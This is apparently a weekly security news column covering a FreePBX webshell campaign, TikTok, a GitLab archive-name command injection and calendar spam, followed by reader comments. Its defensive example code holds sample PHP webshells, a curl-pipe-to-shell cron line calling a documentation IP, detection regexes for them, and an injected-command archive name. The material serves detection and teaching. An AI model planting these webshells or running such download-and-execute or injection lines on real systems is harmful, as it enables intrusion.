This Week In Security: Asterisk, TikTok, Gitlab, And Finally A Spam Solution

There’s an ongoing campaign compromising FreePBX systems around the world. It seems to be aimed specifically at Elastix systems, and it uses CVE-2021-45461, a really nasty Remote Code Execution (RCE) from December of last year. That flaw was a 0-day: it was only discovered by analyzing an already-compromised FreePBX system. It’s unclear whether the campaign described in last week’s report was the one using the 0-day back in December, or whether it was launched in response to the public disclosure of the bug.

Regardless, the vulnerability is in a URL parameter handled by the Rest Phone Apps service. This module is intended to run right on the screen of VoIP phones, letting end users set features like Do Not Disturb without punching in star codes or visiting a web page. Because of that use case, any FreePBX deployment that uses the feature and supports VoIP phones connecting from outside the network has to leave the service’s ports open to the internet. The best way to secure that is to require the phones to connect over a VPN, which only some phones natively support.

Upon finding a vulnerable endpoint, the campaign starts by dropping a webshell in several locations, each obfuscated slightly differently. It then creates multiple root-level user accounts and adds a cron job to maintain access. There is a surprising amount of obfuscation and stealth built into this malware family, which makes it difficult to point to a single Indicator of Compromise. If you run a FreePBX system that may have the Phone Apps module enabled, it’s time to go through it with a fine-toothed comb: extra UID 0 accounts, unfamiliar cron entries, and PHP files under the web root that you didn’t put there are the places to start.
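The three behaviours above (obfuscated PHP webshells, extra root-level accounts, a cron job for persistence) are each cheap to check for. The script below is an added example written for this article, not code from the campaign report or from FreePBX; every input it reads is a constructed sample, and the account name, cron line and PHP snippets are illustrative rather than known indicators from this campaign. On a real host you would feed it /etc/passwd, the root and asterisk crontabs, and the PHP files under the web root.

```python
"""Triage heuristics for a FreePBX host, keyed to the behaviour described above:
dropped, obfuscated PHP webshells; extra root-level (UID 0) accounts; a cron job
for persistence. Added example, not code from the campaign report or FreePBX.
Every input below is a constructed sample; on a live box you would feed it
/etc/passwd, the root and asterisk crontabs, and the PHP files under the web root.
"""
import re

# Constructed /etc/passwd: 'sysadm' is a second UID 0 account (hypothetical name,
# not a known indicator from the campaign).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
asterisk:x:995:993::/var/lib/asterisk:/sbin/nologin
sysadm:x:0:0::/tmp:/bin/bash
nobody:x:99:99:Nobody:/:/sbin/nologin
"""

# Constructed crontab: the first line is a routine FreePBX task, the second pipes
# a remote script straight into a shell (203.0.113.7 is a documentation address).
SAMPLE_CRON = """0 3 * * * /usr/sbin/fwconsole ma updateall
*/5 * * * * curl -s http://203.0.113.7/x.sh | sh
"""

# Constructed PHP sources keyed by path. The first is benign; the other two are
# two different shapes of minimal webshell (request input fed to an executor).
SAMPLE_PHP_FILES = {
    "/var/www/html/admin/index.php": "<?php require_once 'bootstrap.php'; ?>",
    "/var/www/html/admin/.cache.php": "<?php @eval(base64_decode($_REQUEST['q'])); ?>",
    "/var/www/html/rest.php": "<?php $f=$_POST['x']; $c='sys'.'tem'; $c($f); ?>",
}


def extra_uid0_accounts(passwd_text):
    """Return every username with UID 0 other than root."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            hits.append(fields[0])
    return hits


# Download-and-execute pipes, inline base64 decoding, and payloads staged in
# world-writable directories are the usual shapes of a cron persistence entry.
CRON_SUSPECT = re.compile(r"(curl|wget)\b.*\|\s*(sh|bash)\b|base64\s+-d|/dev/shm/|/tmp/")


def suspicious_cron_lines(cron_text):
    """Return non-comment crontab lines that match a persistence pattern."""
    return [line for line in cron_text.splitlines()
            if line and not line.startswith("#") and CRON_SUSPECT.search(line)]


# A webshell needs (a) attacker-controlled input and (b) something that executes it.
WEBSHELL_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
WEBSHELL_EXEC = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\("
    r"|base64_decode\s*\("
    r"|\$\w+\s*\("  # variable function call, e.g. $c($f) after $c='sys'.'tem'
)


def flag_webshells(php_files, threshold=2):
    """Return the paths whose source hits at least `threshold` indicators."""
    flagged = []
    for path, source in php_files.items():
        indicators = 0
        if WEBSHELL_INPUT.search(source):
            indicators += 1
        if WEBSHELL_EXEC.search(source):
            indicators += 1
        if path.rsplit("/", 1)[-1].startswith("."):
            indicators += 1  # dot-prefixed PHP under the web root hides from a casual ls
        if indicators >= threshold:
            flagged.append(path)
    return flagged


def triage(passwd_text, cron_text, php_files):
    """Run all three checks and return the findings as one dict."""
    return {
        "uid0_accounts": extra_uid0_accounts(passwd_text),
        "cron": suspicious_cron_lines(cron_text),
        "webshells": flag_webshells(php_files),
    }


if __name__ == "__main__":
    for category, findings in triage(SAMPLE_PASSWD, SAMPLE_CRON, SAMPLE_PHP_FILES).items():
        print(category, findings)
```

The scoring is deliberately loose: a single `eval(` in a legitimate admin module is not proof of anything, so a file is only flagged when it combines request input with an executor, or is additionally hidden with a dot prefix. Since the article notes the samples are each obfuscated differently, treat a hit as a reason to read the file, not as a signature.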

What’s The Deal with TikTok?

The FCC has once again called for TikTok to be de-listed from the Google Play Store and the Apple App store. What is going on with TikTok? It’s just an app for filming and sharing silly videos, right? There are essentially two potential problems with TikTok, and both of them trace back to the app’s parent company residing in China.

Here in the US we have National Security Letters, and China seems to have a more straightforward system, where “everything is seen in China,” as said by a member of TikTok’s Trust and Safety Department. TikTok uses quite a few permissions, some of which seem a bit overzealous. If you’re a person of interest to the Chinese government, could those permissions be used to surveil you? Absolutely. Just like a US based app could, as a result of a National Security Letter.

The second problem is a bit more subtle, and may stray towards a conspiracy theory, but is worth considering. TikTok has videos about every subject imaginable, from every possible viewpoint. What if the Chinese Communist Party (CCP) wanted a specific rumor to gain traction in the US? Just a little pressure on the video recommendation algorithm would make videos about that topic trend. Instant public opinion lever.

There’s likely a missing piece of the story here, in the form of some classified intel. Until enough time goes by that a Freedom of Information Act request can unlock the rest of the story, it’s going to be unclear how much of the TikTok threat is legitimate, and how much is geo-political wrangling.

Oh, and if you thought you could just open up the Google Play Store and see the exact permissions the TikTok app uses, Google has made the unfortunate decision to hide permissions until you actually do the install. That sounds like a terrible decision and, after a brief outcry, it seems Google agrees. Just before this article went to press, Google announced that they were walking back the change.

Gitlab RCE

Gitlab fixed a very serious problem in its 4th of July round of minor version releases, and [Nguyễn Tiến Giang (Jang)] really wanted to understand what was going on with this one. So much so, that he set up a debuggable install of Gitlab and recreated the issue, bringing us along for the ride. The flaw is in importing an existing Gitlab project, where the archive name is appended directly to a command string. If you can control the value given for the archive name, and avoid tripping any of the checks intended to prevent exactly that, you can trivially insert shell commands that will run on the underlying server. Avoiding those traps is the bulk of the work in turning this into a real PoC. Read the post for full details on the debugging journey.
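The bug class here is worth seeing side by side with its fix. The example below is added for this article and is not GitLab’s code: the function names are hypothetical, `echo` stands in for the real import command so the script runs anywhere with /bin/sh, and the archive-name allowlist is an assumption rather than GitLab’s actual rule. It shows the same archive name reaching a shell via string interpolation, the same name neutralised by quoting, and the preferred fix of never involving a shell at all.

```python
"""Command injection through a user-controlled archive name, the bug class in
the GitLab import flaw described above. Added example, not GitLab's code; the
function names are hypothetical and `echo` stands in for the real import
command so that this runs anywhere with /bin/sh and /bin/echo.
"""
import re
import shlex
import subprocess

# Constructed attacker input: a plausible archive name followed by a shell
# metacharacter and a second command.
MALICIOUS_NAME = "project.tar.gz; echo PWNED"


def import_archive_vulnerable(archive_name):
    """Interpolate the name into a command string and hand it to a shell.
    The ';' terminates the intended command, and whatever follows runs with
    the privileges of the importing service."""
    cmd = f"echo importing {archive_name}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def import_archive_quoted(archive_name):
    """If a shell is unavoidable, quote the value so the shell sees one word.
    shlex.quote wraps it in single quotes and escapes embedded quotes."""
    cmd = f"echo importing {shlex.quote(archive_name)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def import_archive_hardened(archive_name):
    """Preferred fix: build argv and skip the shell. The name reaches execve
    as a single argument, so no metacharacter is ever interpreted."""
    argv = ["echo", "importing", archive_name]
    return subprocess.run(argv, capture_output=True, text=True).stdout


# Allowlist for the name itself (an assumption, not GitLab's rule). A leading
# '-' is rejected because many tools, tar included, will parse such an argument
# as an option rather than a filename even when no shell is involved.
ARCHIVE_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}\.tar\.gz$")


def archive_name_is_valid(archive_name):
    """Accept only names matching the allowlist. A denylist of ';', '|', '`'
    and friends is exactly the kind of check an attacker spends time routing
    around, which is what the write-up above describes."""
    return ARCHIVE_NAME_RE.fullmatch(archive_name) is not None


if __name__ == "__main__":
    print("vulnerable:", repr(import_archive_vulnerable(MALICIOUS_NAME)))
    print("quoted:    ", repr(import_archive_quoted(MALICIOUS_NAME)))
    print("hardened:  ", repr(import_archive_hardened(MALICIOUS_NAME)))
    print("valid name:", archive_name_is_valid(MALICIOUS_NAME))
```

Running it prints two lines for the vulnerable version, the second being the injected `PWNED`, and a single literal line for the quoted and argv versions. Validation and avoiding the shell are complementary: the allowlist rejects the input before it is used anywhere, and the argv form means that even a name that slips past a future, looser check cannot become a second command.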

Calendar Spam Finally Fixed

Consider yourself lucky if you’ve missed out on the scourge that is Calendar spam. Google Calendar is great, because anyone can send you an email with an invite, and the event automatically shows up on your calendar. In retrospect, it seems obvious that this would be used for spam. Regardless, after multiple years of the spam problem, Google is finally rolling out a feature to only add invitations to your calendar from known senders. Now if you get asked about it, or suffer from the spam yourself, you know to look under event settings and make the change. Finally!

14 thoughts on “This Week In Security: Asterisk, TikTok, Gitlab, And Finally A Spam Solution”

  1. Google already does that exact thing with YouTube (see the Trending tab, their “misinformation” campaigns, the suppression of LBRY/Odysee), and they exist in a Democratic Republic. It’s unfortunately not a “conspiracy theory” anymore, just a fact of life.

  2. The Google calendar spam issue seems so obviously an issue, that I’m surprised (1) how did anyone design this in the first place, and (2) how was I not aware of this before? (I don’t use Google calendar myself, but I’d have expected to have heard more people moaning about it).

    From my experience with Google Analytics, Google seem not to care much about spam.

  3. The vast majority of hand wringing we read about TikTok stems from the fact that it isn’t sufficiently under the control of the US national security state. There is a revolving door between platforms like Reddit, Twitter, and Facebook and the NSA/CIA/Atlantic Council. These platforms surveil us around the clock, transform our data into a “product,” and sell it on the market where the government can buy it – no warrant or subpoena necessary.

    They also enable countless propaganda campaigns of their own while suppressing and banning (much needed) radicalism and counterhegemonic thought.

    I don’t think TikTok will deliver us to the promised land. I don’t even use TikTok – but the arguments I see repeated against it over and over again fall pretty flat IMO. I don’t really care if Xi Jinping is reading my DMs on the other side of the globe. I’m much more concerned about the ultra-reactionary cops who are stationed down the street from me, who would deem me an enemy of the state if I explained my politics to them.

    1. I have a similar but slightly different take – it’s not that it’s not under US/FiveEyes etc control/monitoring that really causes concern – it’s more that the style of governance under which it operates is very different and looking ever more hostile to the democratic western ideals. So it’s more like giving free ammunition to a probable future enemy, making it easier for them to actually turn into a real future enemy – not only do they know what their ‘enemy’ the USA’s population is thinking, they have a direct line to influence it and fabricate or censor and so twist that population to their needs. Where the Googles and Facebooks of this world may be distorting and somewhat dangerous with their own agendas, they still want the world pretty much as it is, so they can thrive on the freedoms they enjoy.

      Even the smartest person can be fooled by halfway competent lies, and nobody has the time to check a million sources and every paper ever published on every topic to properly educate themselves on everything and so hope to see the truth of every subject. Nor the understanding of the inevitable backroom dealings to know why now is the right time for all the vague rumours and spinnable facts to come out and upset the apple cart.

      It is not like there is a shortage of information about ourselves a government can put together from the entirely and deliberately public sources we, our friends and relations put out there. On top of all the various official paperwork required for loans/banking/driver’s licenses – If they really want to spy on you they can, and most folks really make it very easy in trade for the convenience some of these platforms bring. Your government doesn’t need to own or have agreements with every web company to learn damn nearly everything about you if it wants to, and can filter that vast swath of data created by their population looking for the outliers that may be dangerous already – More data on any and all random individuals is at this stage probably far less than helpful, maybe even a hindrance as there is so much to process already.

      1. “It is not like there is a shortage of information about ourselves […] public sources we, our friends and relations put out there.”

        A couple weeks ago I was wondering how much info about myself I have posted solely on Hackaday over the years. And what I know about other regular commenters through their comments (it’s not like I am keeping a dossier on everyone, (I am not!) just by things they have written about themselves regarding health, marital status, family, education, work experience, geographical location, etc.)

        Just think of Google Contacts. By using it, they know the names, addresses, email, phone numbers, relationship, workplace, spouse, children, birthdays and birth dates of your friends, even those who have tried to keep their Internet presence to minimum. And the Terms of Service says they will submit the information to a government entity that requests it.

        1. Indeed, the Hackaday community undoubtedly knows more (or at least could if they cared to parse through all my comments) about me than any other internet only grouping as I really don’t use social media etc – though my real life friends do like to contact me through it from time to time so I have the accounts, they just don’t really do anything but reveal the collection of my friends from the real world which like each platform.

          Of course with HaD resembling anonymous to post on how much you can trust the names or content to be truthful…

          Submitted from the IP commonly used by Foldi-One, but its not me honest…

    2. It’s not what TikTok is used for as designed, you’ve got to think of what else it could be used for.

      Example. When you’ve got facial recognition working very well in China due to a requirement for national ID, and you want to expand that beyond your borders to the westerners who “all look the same”, what better way to do that than with a video sharing platform?

      The newer generations are much more likely to embrace facial recognition in their everyday lives than some of us older folks, when it’s coupled with convenience, like being able to order a latte just by winking at a camera.

      Not like this ever happened before with facebook huh.
